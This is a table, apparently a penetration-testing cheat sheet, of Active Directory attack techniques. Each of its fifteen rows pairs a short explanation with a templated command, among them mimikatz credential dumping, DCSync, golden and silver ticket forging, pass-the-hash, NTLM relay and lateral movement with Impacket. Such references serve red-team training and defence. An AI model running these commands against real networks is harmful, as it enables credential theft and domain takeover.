| Technique | Description | Example command |
|---|---|---|
| LDAP Enumeration | Gathering information about the Active Directory environment by querying the directory over LDAP for users, groups, computers, and other objects. Anonymous binds are disabled on most domain controllers, so a bind as any domain user is normally required. | `ldapsearch -x -H ldap://<DC_IP> -D '<user>@<domain>' -w '<password>' -b "dc=example,dc=com"` |
| Kerberos Attacks | Exploiting the Kerberos authentication protocol: Kerberoasting (requesting service tickets for accounts that have an SPN and cracking the ticket's encrypted part offline), Pass-the-Ticket, and forged tickets. | `Invoke-Kerberoast` (PowerView/Empire PowerShell script) |
| Password Dumping | Extracting password hashes from LSASS memory, the SAM and LSA secrets in the registry, or the NTDS.dit database. Run against a domain controller, `secretsdump.py` pulls every domain hash over the replication (DRSUAPI) interface without touching the database file. | `secretsdump.py <domain>/<user>@<dc_ip>` |
| Pass-the-Hash | Authenticating as a user with their NT hash instead of the plaintext password. NTLM computes the challenge response from the hash alone, so the hash is a password equivalent. pth-winexe takes the hash in `LMHASH:NTHASH` form. | `pth-winexe -U <domain>/<user>%<lm_hash>:<nt_hash> //<target_ip> cmd` |
| Pass-the-Ticket | Injecting a stolen Kerberos ticket (a TGT or a service ticket, typically exported as a .kirbi file) into the current logon session and using it to authenticate as the ticket's owner. | `Invoke-Mimikatz -Command '"kerberos::ptt <ticket.kirbi>"'` |
| Silver Ticket Attack | Forging a Kerberos service ticket (TGS) for one service using the key of the service or computer account that runs it. The forged ticket is presented straight to the service, so no 4768/4769 events are generated on the domain controller unless PAC validation is enabled. | `Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<server_fqdn> /service:<service> /rc4:<key> /ptt"'` |
| Golden Ticket Attack | Forging a Kerberos TGT with the domain's krbtgt key. A forged TGT can be used to request service tickets as any user, giving control of the whole domain until the krbtgt password has been rotated twice. | `Invoke-Mimikatz -Command '"kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<hash> /ptt"'` |
| DCSync Attack | Requesting credential material over the Directory Replication Service (DRSUAPI) protocol the way a replication partner would. Requires the Replicating Directory Changes and Replicating Directory Changes All rights, held by default by Domain Admins, Enterprise Admins and domain controller computer accounts. | `Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:<user>"'` |
| BloodHound | Collecting AD relationships (group membership, sessions, ACLs, local admin rights) with SharpHound and analyzing the graph in BloodHound to find attack paths to high-value targets. | `Invoke-BloodHound -CollectionMethod All` |
| Domain Trust Exploitation | Enumerating and abusing trust relationships between domains and forests to move laterally into, or escalate privileges in, trusting domains (for example by forging inter-realm tickets with the trust key, or by abusing unfiltered SID history inside a forest). | `nltest /domain_trusts` |
| GPO Abuse | Modifying Group Policy Objects (or their files in SYSVOL) that a compromised account has write access to, in order to push scheduled tasks, scripts, or local group changes to every computer or user the GPO applies to, for privilege escalation or persistence. | `gpresult /r` (lists the GPOs applied to the current host and user) |
| Credential Theft | Stealing credentials from LSASS memory, the SAM, or LSA secrets on a compromised host. Requires local administrator rights (SeDebugPrivilege); reading LSASS memory is blocked when Credential Guard or LSA protection (RunAsPPL) is enabled. | `mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"` |
| SID History Injection | Adding a privileged SID (for example the Enterprise Admins SID) to an account's sIDHistory attribute so the account is treated as a member of that group. Mimikatz needs `sid::patch` on the domain controller before `sid::add` will write the attribute. | `Invoke-Mimikatz -Command '"sid::patch" "sid::add /sam:<user> /new:<sid>"'` |
| NTLM Relay Attack | Capturing an NTLM authentication attempt and relaying it to another host to authenticate, and execute code, as the victim. Works only against targets that do not require SMB signing (or Extended Protection for Authentication on HTTP/LDAP). | `ntlmrelayx.py -t smb://<target_ip> -smb2support` |
| Lateral Movement | Moving from one compromised machine to others with harvested credentials, for example remote command execution over WMI, SMB (psexec/smbexec), WinRM, or DCOM. | `wmiexec.py <domain>/<user>@<target_ip>` |
|
|
|